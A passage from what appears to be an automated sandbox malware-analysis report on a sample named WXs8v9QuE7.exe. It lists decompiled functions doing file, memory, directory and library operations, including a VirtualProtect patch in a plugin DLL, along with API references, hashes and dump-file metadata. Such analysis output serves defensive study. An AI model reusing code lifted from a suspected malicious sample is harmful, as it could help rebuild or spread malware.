                                                                                                                    0x004028c7
                                                                                                                    0x004028c7
                                                                                                                    0x00401b41
                                                                                                                    0x00000000
                                                                                                                    0x00401b3d
                                                                                                                    0x0040222e
                                                                                                                    0x0040223b
                                                                                                                    0x0040223c
                                                                                                                    0x00402241
                                                                                                                    0x00402241
                                                                                                                    0x004028c9
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • GlobalFree.KERNEL32 ref: 00401B92
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BA4
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFree
                                                                                                                    • String ID: Call
                                                                                                                    • API String ID: 3394109436-1824292864
                                                                                                                    • Opcode ID: f781670e25a6e7b52d9f941d0c48a449cb08d7ed30872f1273f2df5d5f18393b
                                                                                                                    • Instruction ID: 7ccf98c2bcd9f3ca38d4d46a4d581d89e530cf77c0bcd4a38c60e2ffc0b0a282
                                                                                                                    • Opcode Fuzzy Hash: f781670e25a6e7b52d9f941d0c48a449cb08d7ed30872f1273f2df5d5f18393b
                                                                                                                    • Instruction Fuzzy Hash: CD219376A00104ABDB20EF94DE84A9F73B5EB45314720493BF611B33D1E7B8B9819B5D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1000120C, Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileA.KERNELBASE(00000000), ref: 100012CB
                                                                                                                    • GetLastError.KERNEL32 ref: 100013D2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1214770103-0
                                                                                                                    • Opcode ID: fc2908a5ce4c5ea6b7ff2785053878c0e954b60f992c9b301058c9b268dca91a
                                                                                                                    • Instruction ID: 2ceb6a4c5a853c59d91dd8515f1a4a6dd57fa9937a89c7e76f3007f89b0e2592
                                                                                                                    • Opcode Fuzzy Hash: fc2908a5ce4c5ea6b7ff2785053878c0e954b60f992c9b301058c9b268dca91a
                                                                                                                    • Instruction Fuzzy Hash: A05192F6904214DFFB20EFA4D9C279977A8EB443D4F21842AEA04E721DDB34A9808B55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423f70;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42372c =  *0x42372c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42372c, 0x7530,  *0x423714), 0);
					}
				}
				return 0;
			}











                                                                                                                    0x0040138a
                                                                                                                    0x004013fa
                                                                                                                    0x0040139b
                                                                                                                    0x004013a0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004013a2
                                                                                                                    0x004013a3
                                                                                                                    0x004013ad
                                                                                                                    0x00000000
                                                                                                                    0x00401404
                                                                                                                    0x004013b0
                                                                                                                    0x004013b7
                                                                                                                    0x004013bd
                                                                                                                    0x004013be
                                                                                                                    0x004013c0
                                                                                                                    0x004013c2
                                                                                                                    0x004013b9
                                                                                                                    0x004013b9
                                                                                                                    0x004013ba
                                                                                                                    0x004013ba
                                                                                                                    0x004013c9
                                                                                                                    0x004013cb
                                                                                                                    0x004013f4
                                                                                                                    0x004013f4
                                                                                                                    0x004013c9
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                    • SendMessageA.USER32 ref: 004013F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                                                                    • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                                                                                    • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                                                                    • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405F28, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405F28(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EBA(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                                                    0x00405f30
                                                                                                                    0x00405f33
                                                                                                                    0x00405f3a
                                                                                                                    0x00405f42
                                                                                                                    0x00405f4e
                                                                                                                    0x00000000
                                                                                                                    0x00405f55
                                                                                                                    0x00405f45
                                                                                                                    0x00405f4c
                                                                                                                    0x00000000
                                                                                                                    0x00405f5d
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                      • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32 ref: 00405ED1
                                                                                                                      • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                                                                                      • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2547128583-0
                                                                                                                    • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                    • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                                                                                    • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                    • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040586F, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 68%
                                                                                                                    			E0040586F(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                                                    0x00405873
                                                                                                                    0x00405880
                                                                                                                    0x00405895
                                                                                                                    0x0040589b

                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\WXs8v9QuE7.exe,80000000,00000003), ref: 00405873
                                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 415043291-0
                                                                                                                    • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                    • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                                                    • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                    • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405850, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405850(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                                                    0x00405854
                                                                                                                    0x0040585d
                                                                                                                    0x00000000
                                                                                                                    0x00405866
                                                                                                                    0x0040586c

                                                                                                                    APIs
                                                                                                                    • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405866
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AttributesFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3188754299-0
                                                                                                                    • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                    • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                                                                                    • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                    • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004053C3, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004053C3(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                                                    0x004053c9
                                                                                                                    0x004053d1
                                                                                                                    0x00000000
                                                                                                                    0x004053d7
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                                                                                    • GetLastError.KERNEL32 ref: 004053D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1375471231-0
                                                                                                                    • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                    • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                                                                                    • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                    • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403081, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00403081(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                    0x00403085
                                                                                                                    0x00403098
                                                                                                                    0x004030a0
                                                                                                                    0x00000000
                                                                                                                    0x004030a7
                                                                                                                    0x00000000
                                                                                                                    0x004030a9

                                                                                                                    APIs
                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738559852-0
                                                                                                                    • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                    • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                                                                                    • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                    • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10002910, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004054 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}



                                                                                                                    0x10002919
                                                                                                                    0x1000291e
                                                                                                                    0x1000292e
                                                                                                                    0x10002936
                                                                                                                    0x1000293d
                                                                                                                    0x10002942
                                                                                                                    0x10002947
                                                                                                                    0x1000294c
                                                                                                                    0x10002951
                                                                                                                    0x10002956
                                                                                                                    0x10002956
                                                                                                                    0x1000295e

                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 1000292E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                    • Instruction ID: 9c362bd89546411511ea43e0443ad1e83f8bc8cc053274edabd49a87c402c727
                                                                                                                    • Opcode Fuzzy Hash: 34d967791fa0c81937acb5e832d60935bd6fac481f559dacb71f15d92aed8369
                                                                                                                    • Instruction Fuzzy Hash: 01E0C2F15092A1DEF360DF688CC47023FE4E3983C5B03842AE348F7269EB3841448B19
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004030B3, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004030B3(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                    0x004030c1
                                                                                                                    0x004030c7

                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,?), ref: 004030C1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 973152223-0
                                                                                                                    • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                    • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                                    • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                    • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001000, Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 27%
                                                                                                                    			E10001000(intOrPtr _a8, intOrPtr _a16) {
				long _t5;
				void* _t6;

				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				_t5 = E100017FE();
				if(_t5 != 0) {
					_t6 = GlobalAlloc(0x40, _t5); // executed
					_push(_t6);
				} else {
					_push(_t5);
				}
				return E10001825();
			}





                                                                                                                    0x10001004
                                                                                                                    0x1000100d
                                                                                                                    0x10001012
                                                                                                                    0x10001019
                                                                                                                    0x10001021
                                                                                                                    0x10001027
                                                                                                                    0x1000101b
                                                                                                                    0x1000101b
                                                                                                                    0x1000101b
                                                                                                                    0x1000102e

                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 10001021
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocGlobal
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761449716-0
                                                                                                                    • Opcode ID: 61514a1c763785071cf50fc6d6c14fbf39c44340d08e07733eb688f9b32edf2f
                                                                                                                    • Instruction ID: 4bed1d4784c55e4e126bbf2fc3d550e86f6dc06da7f694ddde7ac900ba0193af
                                                                                                                    • Opcode Fuzzy Hash: 61514a1c763785071cf50fc6d6c14fbf39c44340d08e07733eb688f9b32edf2f
                                                                                                                    • Instruction Fuzzy Hash: DFD05EF4604381EBF300DF70C88994B37E8EB4C2D0F118819FA45D2118DA74D8404F20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004056B6, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004056B6(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                                                    0x004056b6
                                                                                                                    0x004056c9
                                                                                                                    0x004056c9
                                                                                                                    0x004056cd
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004056c0
                                                                                                                    0x004056c3
                                                                                                                    0x00000000
                                                                                                                    0x004056c3
                                                                                                                    0x00000000
                                                                                                                    0x004056c0
                                                                                                                    0x004056cf

                                                                                                                    APIs
                                                                                                                    • CharNextA.USER32(?,004031E6,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00409168), ref: 004056C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3213498283-0
                                                                                                                    • Opcode ID: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                                                                    • Instruction ID: b92c2b2cc925d09e3655dddfc00fa39e31e8eee3e0a1cce73cff96a1e9958276
                                                                                                                    • Opcode Fuzzy Hash: b78f2958c7f68e19d57b7ad513a89c73604121592eb64134f43146a97932e323
                                                                                                                    • Instruction Fuzzy Hash: B7C0806440C74057D611471040345777FF0AA91750F945C5EF0C963170C1357C408F3B
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001541, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E10001541() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x10004058); // executed
				return _t1;
			}




                                                                                                                    0x10001549
                                                                                                                    0x1000154f

                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocGlobal
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3761449716-0
                                                                                                                    • Opcode ID: 8dec1988ff7a2beb4b9117a4c8d893658d09db9a8f74ba49e322f4002f413595
                                                                                                                    • Instruction ID: 4dafbad5e8ab0305fa889b032d762fa57f52ac67aacfd2269760c410bf251020
                                                                                                                    • Opcode Fuzzy Hash: 8dec1988ff7a2beb4b9117a4c8d893658d09db9a8f74ba49e322f4002f413595
                                                                                                                    • Instruction Fuzzy Hash: 46A002B2941560DBFE42ABE08D9EF5B3B25E748781F02C040E719641BCCA754064DF29
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
